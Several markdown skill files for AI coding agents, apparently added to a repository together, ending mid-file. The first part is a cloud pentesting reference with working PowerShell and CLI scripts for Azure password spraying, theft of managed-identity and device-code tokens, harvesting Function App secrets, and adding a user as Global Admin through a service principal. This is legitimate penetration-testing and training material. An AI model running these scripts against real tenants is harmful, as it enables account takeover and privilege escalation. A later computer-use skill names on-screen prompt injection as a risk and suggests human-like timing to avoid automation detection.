gcloud beta compute ssh instance-name --zone us-central1-a --project target-project
```

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| Authentication failures | Verify credentials; check MFA; ensure correct tenant/project; try alternative auth methods |
| Permission denied | List current roles; try different resources; check resource policies; verify region |
| Metadata service blocked | Check IMDSv2 (AWS); verify instance role; check firewall for 169.254.169.254 |
| Rate limiting | Add delays; spread across regions; use multiple credentials; focus on high-value targets |

## References

- [Advanced Cloud Scripts](references/advanced-cloud-scripts.md) - Azure Automation runbooks, Function Apps enumeration, AWS data exfiltration, GCP advanced exploitation
@@ -0,0 +1,318 @@

# Advanced Cloud Pentesting Scripts

Reference: [Cloud Pentesting Cheatsheet by Beau Bullock](https://github.com/dafthack/CloudPentestCheatsheets)

## Azure Automation Runbooks

### Export All Runbooks from All Subscriptions

```powershell
$subs = Get-AzSubscription
foreach($s in $subs){
    $subscriptionid = $s.SubscriptionId
    mkdir .\$subscriptionid\
    Select-AzSubscription -Subscription $subscriptionid
    $runbooks = @()
    $autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
    foreach ($i in $autoaccounts){
        $runbooks += Get-AzAutomationRunbook -AutomationAccountName $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,Name
    }
    foreach($r in $runbooks){
        Export-AzAutomationRunbook -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -Name $r.Name -OutputFolder .\$subscriptionid\
    }
}
```

### Export All Automation Job Outputs

```powershell
$subs = Get-AzSubscription
$jobout = @()
foreach($s in $subs){
    $subscriptionid = $s.SubscriptionId
    Select-AzSubscription -Subscription $subscriptionid
    $jobs = @()
    $autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
    foreach ($i in $autoaccounts){
        $jobs += Get-AzAutomationJob -AutomationAccountName $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,JobId
    }
    foreach($r in $jobs){
        $jobout += Get-AzAutomationJobOutput -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -JobId $r.JobId
    }
}
$jobout | Out-File -Encoding ascii joboutputs.txt
```

## Azure Function Apps

### List All Function App Hostnames

```powershell
$functionapps = Get-AzFunctionApp
foreach($f in $functionapps){
    $f.EnabledHostname
}
```

### Extract Function App Information

```powershell
$subs = Get-AzSubscription
$allfunctioninfo = @()
foreach($s in $subs){
    $subscriptionid = $s.SubscriptionId
    Select-AzSubscription -Subscription $subscriptionid
    $functionapps = Get-AzFunctionApp
    foreach($f in $functionapps){
        $allfunctioninfo += $f.config | Select-Object AcrUseManagedIdentityCred,AcrUserManagedIdentityId,AppCommandLine,ConnectionString,CorSupportCredentials,CustomActionParameter
        $allfunctioninfo += $f.SiteConfig | fl
        $allfunctioninfo += $f.ApplicationSettings | fl
        $allfunctioninfo += $f.IdentityUserAssignedIdentity.Keys | fl
    }
}
$allfunctioninfo
```

## Azure Device Code Login Flow

### Initiate Device Code Login

```powershell
$body = @{
    "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
    "resource" = "https://graph.microsoft.com"
}
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
$Headers = @{}
$Headers["User-Agent"] = $UserAgent
$authResponse = Invoke-RestMethod `
    -UseBasicParsing `
    -Method Post `
    -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
    -Headers $Headers `
    -Body $body
$authResponse
```

Navigate to https://microsoft.com/devicelogin and enter the code.

### Retrieve Access Tokens

```powershell
$body = @{
    "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
    "grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
    "code" = $authResponse.device_code
}
$Tokens = Invoke-RestMethod `
    -UseBasicParsing `
    -Method Post `
    -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
    -Headers $Headers `
    -Body $body
$Tokens
```
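
The same two-step device-code flow can be sketched in Python with only the standard library; the client_id is the well-known app ID already used in the PowerShell snippets above, and the endpoints match them:

```python
import json
import urllib.parse
import urllib.request

TENANT = "common"
CLIENT_ID = "1950a258-227b-4e31-a9cf-717495945fc2"  # same app ID as above

def form_body(fields):
    """URL-encode a dict as an application/x-www-form-urlencoded body."""
    return urllib.parse.urlencode(fields).encode()

def post_form(url, fields):
    with urllib.request.urlopen(urllib.request.Request(url, data=form_body(fields))) as resp:
        return json.loads(resp.read())

def start_device_login():
    # Step 1: request a device code; show user_code to the operator
    return post_form(
        f"https://login.microsoftonline.com/{TENANT}/oauth2/devicecode?api-version=1.0",
        {"client_id": CLIENT_ID, "resource": "https://graph.microsoft.com"})

def redeem(device_code):
    # Step 2: after the code is entered at microsoft.com/devicelogin
    return post_form(
        f"https://login.microsoftonline.com/{TENANT}/oauth2/token?api-version=1.0",
        {"client_id": CLIENT_ID,
         "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
         "code": device_code})
```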
|
||||
|
||||
## Azure Managed Identity Token Retrieval
|
||||
|
||||
```powershell
|
||||
# From Azure VM
|
||||
Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
|
||||
|
||||
# Full instance metadata
|
||||
$instance = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
|
||||
$instance
|
||||
```
|
||||
|
||||
## AWS Region Iteration Scripts

Create `regions.txt`:

```
us-east-1
us-east-2
us-west-1
us-west-2
ca-central-1
eu-west-1
eu-west-2
eu-west-3
eu-central-1
eu-north-1
ap-southeast-1
ap-southeast-2
ap-south-1
ap-northeast-1
ap-northeast-2
ap-northeast-3
sa-east-1
```
### List All EC2 Public IPs

```bash
while read -r r; do
    aws ec2 describe-instances --query 'Reservations[].Instances[].PublicIpAddress' --region "$r" | jq -r '.[]' >> ec2-public-ips.txt
done < regions.txt
sort -u ec2-public-ips.txt -o ec2-public-ips.txt
```
### List All ELB DNS Addresses

```bash
while read -r r; do
    aws elbv2 describe-load-balancers --query 'LoadBalancers[*].DNSName' --region "$r" | jq -r '.[]' >> elb-public-dns.txt
    aws elb describe-load-balancers --query 'LoadBalancerDescriptions[*].DNSName' --region "$r" | jq -r '.[]' >> elb-public-dns.txt
done < regions.txt
sort -u elb-public-dns.txt -o elb-public-dns.txt
```
### List All RDS DNS Addresses

```bash
while read -r r; do
    aws rds describe-db-instances --query 'DBInstances[*].Endpoint.Address' --region "$r" | jq -r '.[]' >> rds-public-dns.txt
done < regions.txt
sort -u rds-public-dns.txt -o rds-public-dns.txt
```
### Get CloudFormation Outputs

```bash
while read -r r; do
    aws cloudformation describe-stacks --query 'Stacks[*].[StackName, Description, Parameters, Outputs]' --region "$r" | jq -r '.[]' >> cloudformation-outputs.txt
done < regions.txt
```
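The four loops above repeat the same read-regions scaffold. As a sketch, it can be factored into a helper; the function name `for_each_region` is ours, not part of the AWS CLI:

```shell
#!/usr/bin/env bash
# Hypothetical helper generalizing the loops above: run any command once
# per region listed in regions.txt, appending "--region <r>" each time.
for_each_region() {
  local r
  while read -r r; do
    [ -n "$r" ] || continue          # skip blank lines
    "$@" --region "$r"
  done < regions.txt
}

# Example (uses echo instead of calling AWS, so it is safe to run anywhere):
printf 'us-east-1\nus-west-2\n' > regions.txt
for_each_region echo aws rds describe-db-instances
# prints:
#   aws rds describe-db-instances --region us-east-1
#   aws rds describe-db-instances --region us-west-2
```

Replace `echo aws ...` with the real command (e.g. `for_each_region aws ec2 describe-instances --query '...'`) once the output looks right.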
## ScoutSuite jq Parsing Queries

### AWS Queries

```bash
# Find All Lambda Environment Variables
for d in */ ; do
    tail -n +2 "$d"scoutsuite-results/scoutsuite_results*.js | jq '.services.awslambda.regions[].functions[] | select(.env_variables != []) | .arn, .env_variables' >> lambda-all-environment-variables.txt
done

# Find World Listable S3 Buckets
for d in */ ; do
    tail -n +2 "$d"scoutsuite-results/scoutsuite_results*.js | jq '.account_id, .services.s3.findings."s3-bucket-AuthenticatedUsers-read".items[]' >> s3-buckets-world-listable.txt
done

# Find All EC2 User Data
for d in */ ; do
    tail -n +2 "$d"scoutsuite-results/scoutsuite_results*.js | jq '.services.ec2.regions[].vpcs[].instances[] | select(.user_data != null) | .arn, .user_data' >> ec2-instance-all-user-data.txt
done

# Find EC2 Security Groups That Whitelist AWS CIDRs
for d in */ ; do
    tail -n +2 "$d"scoutsuite-results/scoutsuite_results*.js | jq '.account_id' >> ec2-security-group-whitelists-aws-cidrs.txt
    tail -n +2 "$d"scoutsuite-results/scoutsuite_results*.js | jq '.services.ec2.findings."ec2-security-group-whitelists-aws".items' >> ec2-security-group-whitelists-aws-cidrs.txt
done

# Find All Unencrypted EC2 EBS Volumes
for d in */ ; do
    tail -n +2 "$d"scoutsuite-results/scoutsuite_results*.js | jq '.services.ec2.regions[].volumes[] | select(.Encrypted == false) | .arn' >> ec2-ebs-volume-not-encrypted.txt
done

# Find All Unencrypted EC2 EBS Snapshots
for d in */ ; do
    tail -n +2 "$d"scoutsuite-results/scoutsuite_results*.js | jq '.services.ec2.regions[].snapshots[] | select(.encrypted == false) | .arn' >> ec2-ebs-snapshot-not-encrypted.txt
done
```
### Azure Queries

```bash
# List All Azure App Service Host Names
tail -n +2 scoutsuite_results_azure-tenant-*.js | jq -r '.services.appservice.subscriptions[].web_apps[].host_names[]'

# List All Azure SQL Servers
tail -n +2 scoutsuite_results_azure-tenant-*.js | jq -jr '.services.sqldatabase.subscriptions[].servers[] | .name,".database.windows.net","\n"'

# List All Azure Virtual Machine Hostnames
tail -n +2 scoutsuite_results_azure-tenant-*.js | jq -jr '.services.virtualmachines.subscriptions[].instances[] | .name,".",.location,".cloudapp.windows.net","\n"'

# List Storage Accounts
tail -n +2 scoutsuite_results_azure-tenant-*.js | jq -r '.services.storageaccounts.subscriptions[].storage_accounts[] | .name'

# List Disks Encrypted with Platform Managed Keys
# (note: == for comparison; a single = would be an assignment in jq)
tail -n +2 scoutsuite_results_azure-tenant-*.js | jq '.services.virtualmachines.subscriptions[].disks[] | select(.encryption_type == "EncryptionAtRestWithPlatformKey") | .name' > disks-with-pmks.txt
```
## Password Spraying with Az PowerShell

```powershell
$userlist = Get-Content userlist.txt
$passlist = Get-Content passlist.txt
$linenumber = 0
$count = $userlist.count
foreach ($line in $userlist) {
    $user = $line
    $pass = ConvertTo-SecureString $passlist[$linenumber] -AsPlainText -Force
    $current = $linenumber + 1
    Write-Host -NoNewline ("`r[" + $current + "/" + $count + "] " + "Trying: " + $user + " and " + $passlist[$linenumber])
    $linenumber++
    $Cred = New-Object System.Management.Automation.PSCredential ($user, $pass)
    try {
        Connect-AzAccount -Credential $Cred -ErrorAction Stop -WarningAction SilentlyContinue
        Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
        Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
    }
    catch {
        $Failure = $_.Exception
        if ($Failure -match "ID3242") { continue }
        else {
            Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
            Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
            Add-Content valid-creds.txt $Failure.Message
            Write-Host -ForegroundColor red $Failure.Message
        }
    }
}
```
## Service Principal Attack Path

```bash
# Reset service principal credential
az ad sp credential reset --id <app_id>
az ad sp credential list --id <app_id>

# Login as service principal
az login --service-principal -u "app id" -p "password" --tenant <tenant ID> --allow-no-subscriptions

# Create new user in tenant
az ad user create --display-name <name> --password <password> --user-principal-name <upn>

# Add user to Global Admin via MS Graph
# (62e90394-... is the fixed role definition ID for Global Administrator)
Body="{'principalId': '<user object id>', 'roleDefinitionId': '62e90394-69f5-4237-9190-012177145e10', 'directoryScopeId': '/'}"
az rest --method POST --uri https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments --headers "Content-Type=application/json" --body "$Body"
```
## Additional Tools Reference

| Tool | URL | Purpose |
|------|-----|---------|
| MicroBurst | github.com/NetSPI/MicroBurst | Azure security assessment |
| PowerZure | github.com/hausec/PowerZure | Azure post-exploitation |
| ROADTools | github.com/dirkjanm/ROADtools | Azure AD enumeration |
| Stormspotter | github.com/Azure/Stormspotter | Azure attack path graphing |
| MSOLSpray | github.com/dafthack/MSOLSpray | O365 password spraying |
| AzureHound | github.com/BloodHoundAD/AzureHound | Azure AD attack paths |
| WeirdAAL | github.com/carnal0wnage/weirdAAL | AWS enumeration |
| Pacu | github.com/RhinoSecurityLabs/pacu | AWS exploitation |
| ScoutSuite | github.com/nccgroup/ScoutSuite | Multi-cloud auditing |
| cloud_enum | github.com/initstring/cloud_enum | Public resource discovery |
| GitLeaks | github.com/zricethezav/gitleaks | Secret scanning |
| TruffleHog | github.com/dxa4481/truffleHog | Git secret scanning |
| ip2Provider | github.com/oldrho/ip2provider | Cloud IP identification |
| FireProx | github.com/ustayready/fireprox | IP rotation via AWS API Gateway |
## Vulnerable Training Environments

| Platform | URL | Purpose |
|----------|-----|---------|
| CloudGoat | github.com/RhinoSecurityLabs/cloudgoat | AWS vulnerable lab |
| SadCloud | github.com/nccgroup/sadcloud | Terraform misconfigs |
| Flaws Cloud | flaws.cloud | AWS CTF challenges |
| Thunder CTF | thunder-ctf.cloud | GCP CTF challenges |
**New file:** `skills/computer-use-agents/SKILL.md` (315 lines)
---
name: computer-use-agents
description: "Build AI agents that interact with computers like humans do - viewing screens, moving cursors, clicking buttons, and typing text. Covers Anthropic's Computer Use, OpenAI's Operator/CUA, and open-source alternatives. Critical focus on sandboxing, security, and handling the unique challenges of vision-based control. Use when: computer use, desktop automation agent, screen control AI, vision-based agent, GUI automation."
source: vibeship-spawner-skills (Apache 2.0)
---

# Computer Use Agents

## Patterns
### Perception-Reasoning-Action Loop
|
||||
|
||||
The fundamental architecture of computer use agents: observe screen,
|
||||
reason about next action, execute action, repeat. This loop integrates
|
||||
vision models with action execution through an iterative pipeline.
|
||||
|
||||
Key components:
|
||||
1. PERCEPTION: Screenshot captures current screen state
|
||||
2. REASONING: Vision-language model analyzes and plans
|
||||
3. ACTION: Execute mouse/keyboard operations
|
||||
4. FEEDBACK: Observe result, continue or correct
|
||||
|
||||
Critical insight: Vision agents are completely still during "thinking"
|
||||
phase (1-5 seconds), creating a detectable pause pattern.
|
||||
|
||||
|
||||
**When to use**: ['Building any computer use agent from scratch', 'Integrating vision models with desktop control', 'Understanding agent behavior patterns']
|
||||
|
||||
```python
from anthropic import Anthropic
from PIL import Image
import base64
import pyautogui
import time

class ComputerUseAgent:
    """
    Perception-Reasoning-Action loop implementation.
    Based on Anthropic Computer Use patterns.
    """

    def __init__(self, client: Anthropic, model: str = "claude-sonnet-4-20250514"):
        self.client = client
        self.model = model
        self.max_steps = 50  # Prevent runaway loops
        self.action_delay = 0.5  # Seconds between actions

    def capture_screenshot(self) -> str:
        """Capture screen and return base64 encoded image."""
        screenshot = pyautogui.screenshot()
        # Resize for token efficiency (1280x800 is a good balance)
        screenshot = screenshot.resize((1280, 800), Image.LANCZOS)

        import io
        buffer = io.BytesIO()
        screenshot.save(buffer, format="PNG")
        return base64.b64encode(buffer.getvalue()).decode()

    def execute_action(self, action: dict) -> dict:
        """Execute mouse/keyboard action on the computer."""
        action_type = action.get("type")

        if action_type == "click":
            x, y = action["x"], action["y"]
            button = action.get("button", "left")
            pyautogui.click(x, y, button=button)
            return {"success": True, "action": f"clicked at ({x}, {y})"}

        elif action_type == "type":
            text = action["text"]
            pyautogui.typewrite(text, interval=0.02)
            return {"success": True, "action": f"typed {len(text)} chars"}

        elif action_type == "key":
            key = action["key"]
            pyautogui.press(key)
            return {"success": True, "action": f"pressed {key}"}

        elif action_type == "scroll":
            direction = action.get("direction", "down")
            amount = action.get("amount", 3)
            scroll = -amount if direction == "down" else amount
            pyautogui.scroll(scroll)
            return {"success": True, "action": f"scrolled {direction}"}

        return {"success": False, "error": f"unknown action type: {action_type}"}
```
### Sandboxed Environment Pattern
|
||||
|
||||
Computer use agents MUST run in isolated, sandboxed environments.
|
||||
Never give agents direct access to your main system - the security
|
||||
risks are too high. Use Docker containers with virtual desktops.
|
||||
|
||||
Key isolation requirements:
|
||||
1. NETWORK: Restrict to necessary endpoints only
|
||||
2. FILESYSTEM: Read-only or scoped to temp directories
|
||||
3. CREDENTIALS: No access to host credentials
|
||||
4. SYSCALLS: Filter dangerous system calls
|
||||
5. RESOURCES: Limit CPU, memory, time
|
||||
|
||||
The goal is "blast radius minimization" - if the agent goes wrong,
|
||||
damage is contained to the sandbox.
|
||||
|
||||
|
||||
**When to use**: ['Deploying any computer use agent', 'Testing agent behavior safely', 'Running untrusted automation tasks']
|
||||
|
||||
```dockerfile
# Dockerfile for sandboxed computer use environment
# Based on Anthropic's reference implementation pattern

FROM ubuntu:22.04

# Install desktop environment
RUN apt-get update && apt-get install -y \
    xvfb \
    x11vnc \
    fluxbox \
    xterm \
    firefox \
    python3 \
    python3-pip \
    supervisor

# Security: Create non-root user
RUN useradd -m -s /bin/bash agent && \
    mkdir -p /home/agent/.vnc

# Install Python dependencies
COPY requirements.txt /tmp/
RUN pip3 install -r /tmp/requirements.txt

# Security: Drop capabilities
RUN apt-get install -y --no-install-recommends libcap2-bin && \
    setcap -r /usr/bin/python3 || true

# Copy agent code
COPY --chown=agent:agent . /app
WORKDIR /app

# Supervisor config for virtual display + VNC
COPY supervisord.conf /etc/supervisor/conf.d/

# Expose VNC port only (not the desktop directly)
EXPOSE 5900

# Run as non-root
USER agent

CMD ["/usr/bin/supervisord", "-c", "/etc/supervisor/conf.d/supervisord.conf"]
```

```yaml
# docker-compose.yml with security constraints
version: '3.8'

services:
  computer-use-agent:
    build: .
    ports:
      - "5900:5900"  # VNC for observation
      - "8080:8080"  # API for control

    # Security constraints
    security_opt:
      - no-new-privileges:true
      - seccomp:seccomp-profile.json

    # Resource limits
    deploy:
      resources:
        limits:
          cpus: '2'
          memory: 4G
        reservations:
          cpus: '0.5'
          memory: 1G

    # Network isolation
    networks:
      - agent-network

    # No access to host filesystem
    volumes:
      - agent-tmp:/tmp

    # Read-only root filesystem
    read_only: true
    tmpfs:
      - /run
      - /var/run

    # Environment
    environment:
      - DISPLAY=:99
      - NO_PROXY=localhost

networks:
  agent-network:
    driver: bridge
    internal: true  # No internet by default

volumes:
  agent-tmp:
```

```python
# Python wrapper with additional runtime sandboxing
# (source truncates here mid-import)
import subprocess
import os
from dataclasses import dataclass
```
### Anthropic Computer Use Implementation

Official implementation pattern using Claude's computer use capability.
Claude 3.5 Sonnet was the first frontier model to offer computer use.
Claude Opus 4.5 is now the "best model in the world for computer use."

Key capabilities:

- screenshot: Capture current screen state
- mouse: Click, move, drag operations
- keyboard: Type text, press keys
- bash: Run shell commands
- text_editor: View and edit files

Tool versions:

- computer_20251124 (Opus 4.5): Adds zoom action for detailed inspection
- computer_20250124 (All other models): Standard capabilities

Critical limitation: "Some UI elements (like dropdowns and scrollbars)
might be tricky for Claude to manipulate" - Anthropic docs

**When to use**: building production computer use agents; need the highest-quality vision understanding; full desktop control (not just browser).
```python
from anthropic import Anthropic
from anthropic.types.beta import (
    BetaToolComputerUse20241022,
    BetaToolBash20241022,
    BetaToolTextEditor20241022,
)
import subprocess
import base64
from PIL import Image
import io

class AnthropicComputerUse:
    """
    Official Anthropic Computer Use implementation.

    Requires:
    - Docker container with virtual display
    - VNC for viewing agent actions
    - Proper tool implementations
    """

    def __init__(self):
        self.client = Anthropic()
        self.model = "claude-sonnet-4-20250514"  # Best for computer use
        self.screen_size = (1280, 800)

    def get_tools(self) -> list:
        """Define computer use tools."""
        return [
            BetaToolComputerUse20241022(
                type="computer_20241022",
                name="computer",
                display_width_px=self.screen_size[0],
                display_height_px=self.screen_size[1],
            ),
            BetaToolBash20241022(
                type="bash_20241022",
                name="bash",
            ),
            BetaToolTextEditor20241022(
                type="text_editor_20241022",
                name="str_replace_editor",
            ),
        ]

    def execute_tool(self, name: str, input: dict) -> dict:
        """Execute a tool and return result."""

        if name == "computer":
            return self._handle_computer_action(input)
        elif name == "bash":
            return self._handle_bash(input)
        elif name == "str_replace_editor":
            return self._handle_editor(input)
        else:
            return {"error": f"Unknown tool: {name}"}

    def _handle_computer_action(self, input: dict) -> dict:
        """Handle computer control actions."""
        action = input.get("action")

        if action == "screenshot":
            # Capture via scrot (source truncates here; return shape abbreviated)
            subprocess.run(["scrot", "/tmp/screenshot.png"])

            with open("/tmp/screenshot.png", "rb") as f:
                return {"type": "image", "base64": base64.b64encode(f.read()).decode()}
```
## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Prompt injection via on-screen content | critical | Defense in depth - no single solution works |
| Detectable automation patterns (uniform timing, pixel-perfect clicks) | medium | Add human-like variance to actions |
| Dropdowns and scrollbars are hard to manipulate visually | high | Use keyboard alternatives when possible |
| Latency of the screenshot-reason-act cycle | medium | Accept the tradeoff |
| Screenshot history blows up the context window | high | Implement context management |
| Token costs grow quickly over long sessions | high | Monitor and limit costs |
| Agent actions can damage the host system | critical | ALWAYS use sandboxing |
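One mitigation above, adding human-like variance, can be sketched as a pure function that jitters each planned click and picks a randomized delay. This is an illustrative sketch; the function name and defaults are ours, and a real agent would feed the result into `pyautogui.click()` plus a sleep.

```python
import random

def humanize(x: int, y: int, max_offset: int = 3,
             min_delay: float = 0.2, max_delay: float = 1.5):
    """Jitter a planned click target by a few pixels and choose a
    human-ish delay, so actions are not pixel-perfect and uniformly timed."""
    jx = x + random.randint(-max_offset, max_offset)
    jy = y + random.randint(-max_offset, max_offset)
    delay = random.uniform(min_delay, max_delay)
    return jx, jy, delay

jx, jy, delay = humanize(640, 400)
```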
**New file:** `skills/concise-planning/SKILL.md` (62 lines)
---
name: concise-planning
description: Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist.
---

# Concise Planning

## Goal

Turn a user request into a **single, actionable plan** with atomic steps.

## Workflow

### 1. Scan Context

- Read `README.md`, docs, and relevant code files.
- Identify constraints (language, frameworks, tests).

### 2. Minimal Interaction

- Ask **at most 1–2 questions**, and only if truly blocking.
- Make reasonable assumptions for non-blocking unknowns.

### 3. Generate Plan

Use the following structure:

- **Approach**: 1-3 sentences on what and why.
- **Scope**: Bullet points for "In" and "Out".
- **Action Items**: A list of 6-10 atomic, ordered tasks (verb-first).
- **Validation**: At least one item for testing.

## Plan Template

```markdown
# Plan

<High-level approach>

## Scope

- In:
- Out:

## Action Items

- [ ] <Step 1: Discovery>
- [ ] <Step 2: Implementation>
- [ ] <Step 3: Implementation>
- [ ] <Step 4: Validation/Testing>
- [ ] <Step 5: Rollout/Commit>

## Open Questions

- <Question 1 (max 3)>
```

## Checklist Guidelines

- **Atomic**: Each step should be a single logical unit of work.
- **Verb-first**: "Add...", "Refactor...", "Verify...".
- **Concrete**: Name specific files or modules when possible.
**New file:** `skills/context-window-management/SKILL.md` (53 lines)
---
name: context-window-management
description: "Strategies for managing LLM context windows including summarization, trimming, routing, and avoiding context rot. Use when: context window, token limit, context management, context engineering, long context."
source: vibeship-spawner-skills (Apache 2.0)
---

# Context Window Management

You're a context engineering specialist who has optimized LLM applications handling
millions of conversations. You've seen systems hit token limits, suffer context rot,
and lose critical information mid-dialogue.

You understand that context is a finite resource with diminishing returns. More tokens
doesn't mean better results—the art is in curating the right information. You know
the serial position effect, the lost-in-the-middle problem, and when to summarize
versus when to retrieve.

Your core skill is curation: choosing what belongs in the window, not filling it.
## Capabilities

- context-engineering
- context-summarization
- context-trimming
- context-routing
- token-counting
- context-prioritization

## Patterns

### Tiered Context Strategy

Different strategies based on context size.

### Serial Position Optimization

Place important content at the start and end.

### Intelligent Summarization

Summarize by importance, not just recency.

## Anti-Patterns

### ❌ Naive Truncation

### ❌ Ignoring Token Costs

### ❌ One-Size-Fits-All

## Related Skills

Works well with: `rag-implementation`, `conversation-memory`, `prompt-caching`, `llm-npc-dialogue`
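The trimming and serial-position patterns in this skill can be combined in a small sketch: a token budget, and middle-first dropping that preserves the first and last messages. The 4-characters-per-token estimate and all names here are our assumptions, not any library's API; production code would use a real tokenizer such as tiktoken.

```python
def estimate_tokens(text: str) -> int:
    # Rough heuristic: ~4 characters per token for English text.
    return max(1, len(text) // 4)

def trim_middle(messages: list[str], budget: int, keep_ends: int = 2) -> list[str]:
    """Drop messages from the middle first (lost-in-the-middle effect),
    always preserving the first and last `keep_ends` messages."""
    if len(messages) <= 2 * keep_ends:
        return messages
    if sum(estimate_tokens(m) for m in messages) <= budget:
        return messages
    head, tail = messages[:keep_ends], messages[-keep_ends:]
    middle = messages[keep_ends:-keep_ends]
    # Remove middle messages oldest-first until the budget is met.
    while middle and sum(estimate_tokens(m) for m in head + middle + tail) > budget:
        middle.pop(0)
    return head + middle + tail
```

A usage sketch: with ten 40-character messages (~10 tokens each) and a budget of 50, the result keeps the two oldest, the two newest, and the most recent middle message.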
**New file:** `skills/conversation-memory/SKILL.md` (61 lines)
---
name: conversation-memory
description: "Persistent memory systems for LLM conversations including short-term, long-term, and entity-based memory. Use when: conversation memory, remember, memory persistence, long-term memory, chat history."
source: vibeship-spawner-skills (Apache 2.0)
---

# Conversation Memory

You're a memory systems specialist who has built AI assistants that remember
users across months of interactions. You've implemented systems that know when
to remember, when to forget, and how to surface relevant memories.

You understand that memory is not just storage—it's about retrieval, relevance,
and context. You've seen systems that remember everything (and overwhelm context)
and systems that forget too much (frustrating users).

Your core principles:
1. Memory types differ—short-term, long-term, and entity memory serve different purposes.
## Capabilities

- short-term-memory
- long-term-memory
- entity-memory
- memory-persistence
- memory-retrieval
- memory-consolidation

## Patterns

### Tiered Memory System

Different memory tiers for different purposes.

### Entity Memory

Store and update facts about entities.

### Memory-Aware Prompting

Include relevant memories in prompts.

## Anti-Patterns

### ❌ Remember Everything

### ❌ No Memory Retrieval

### ❌ Single Memory Store

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Memory store grows unbounded, system slows | high | Implement memory lifecycle management |
| Retrieved memories not relevant to current query | high | Intelligent memory retrieval |
| Memories from one user accessible to another | critical | Strict user isolation in memory |

## Related Skills

Works well with: `context-window-management`, `rag-implementation`, `prompt-caching`, `llm-npc-dialogue`
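A minimal sketch of the tiered pattern this skill describes: a short-term ring buffer for recent turns, a long-term fact store keyed by entity, and naive keyword retrieval. All class and method names are illustrative; a production system would use embeddings for retrieval and a database for persistence.

```python
from collections import deque

class TieredMemory:
    """Illustrative sketch: short-term buffer + long-term entity facts."""

    def __init__(self, short_term_size: int = 10):
        self.short_term = deque(maxlen=short_term_size)  # recent turns only
        self.entities: dict[str, dict[str, str]] = {}    # long-term facts

    def add_turn(self, role: str, text: str) -> None:
        # Oldest turns fall off automatically when the buffer is full.
        self.short_term.append((role, text))

    def remember(self, entity: str, key: str, value: str) -> None:
        # Upsert: updating an existing fact replaces the stale value.
        self.entities.setdefault(entity, {})[key] = value

    def relevant_memories(self, query: str) -> list[str]:
        # Naive keyword match; swap for embedding similarity in production.
        q = query.lower()
        return [f"{e}.{k} = {v}"
                for e, facts in self.entities.items()
                for k, v in facts.items()
                if e.lower() in q or k.lower() in q]
```

Retrieved lines can then be prepended to the prompt (memory-aware prompting) instead of replaying the whole history.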
**New file:** `skills/crewai/SKILL.md` (243 lines)
---
name: crewai
description: "Expert in CrewAI - the leading role-based multi-agent framework used by 60% of Fortune 500 companies. Covers agent design with roles and goals, task definition, crew orchestration, process types (sequential, hierarchical, parallel), memory systems, and flows for complex workflows. Essential for building collaborative AI agent teams. Use when: crewai, multi-agent team, agent roles, crew of agents, role-based agents."
source: vibeship-spawner-skills (Apache 2.0)
---

# CrewAI

**Role**: CrewAI Multi-Agent Architect

You are an expert in designing collaborative AI agent teams with CrewAI. You think
in terms of roles, responsibilities, and delegation. You design clear agent personas
with specific expertise, create well-defined tasks with expected outputs, and
orchestrate crews for optimal collaboration. You know when to use sequential vs
hierarchical processes.
## Capabilities

- Agent definitions (role, goal, backstory)
- Task design and dependencies
- Crew orchestration
- Process types (sequential, hierarchical)
- Memory configuration
- Tool integration
- Flows for complex workflows

## Requirements

- Python 3.10+
- crewai package
- LLM API access

## Patterns

### Basic Crew with YAML Config

Define agents and tasks in YAML (recommended).

**When to use**: Any CrewAI project
```yaml
# config/agents.yaml
researcher:
  role: "Senior Research Analyst"
  goal: "Find comprehensive, accurate information on {topic}"
  backstory: |
    You are an expert researcher with years of experience
    in gathering and analyzing information. You're known
    for your thorough and accurate research.
  tools:
    - SerperDevTool
    - WebsiteSearchTool
  verbose: true

writer:
  role: "Content Writer"
  goal: "Create engaging, well-structured content"
  backstory: |
    You are a skilled writer who transforms research
    into compelling narratives. You focus on clarity
    and engagement.
  verbose: true

# config/tasks.yaml
research_task:
  description: |
    Research the topic: {topic}

    Focus on:
    1. Key facts and statistics
    2. Recent developments
    3. Expert opinions
    4. Contrarian viewpoints

    Be thorough and cite sources.
  agent: researcher
  expected_output: |
    A comprehensive research report with:
    - Executive summary
    - Key findings (bulleted)
    - Sources cited

writing_task:
  description: |
    Using the research provided, write an article about {topic}.

    Requirements:
    - 800-1000 words
    - Engaging introduction
    - Clear structure with headers
    - Actionable conclusion
  agent: writer
  expected_output: "A polished article ready for publication"
  context:
    - research_task  # Uses output from research
```

```python
# crew.py
from crewai import Agent, Task, Crew, Process
from crewai.project import CrewBase, agent, task, crew

@CrewBase
class ContentCrew:
    agents_config = 'config/agents.yaml'
    tasks_config = 'config/tasks.yaml'

    @agent
    def researcher(self) -> Agent:
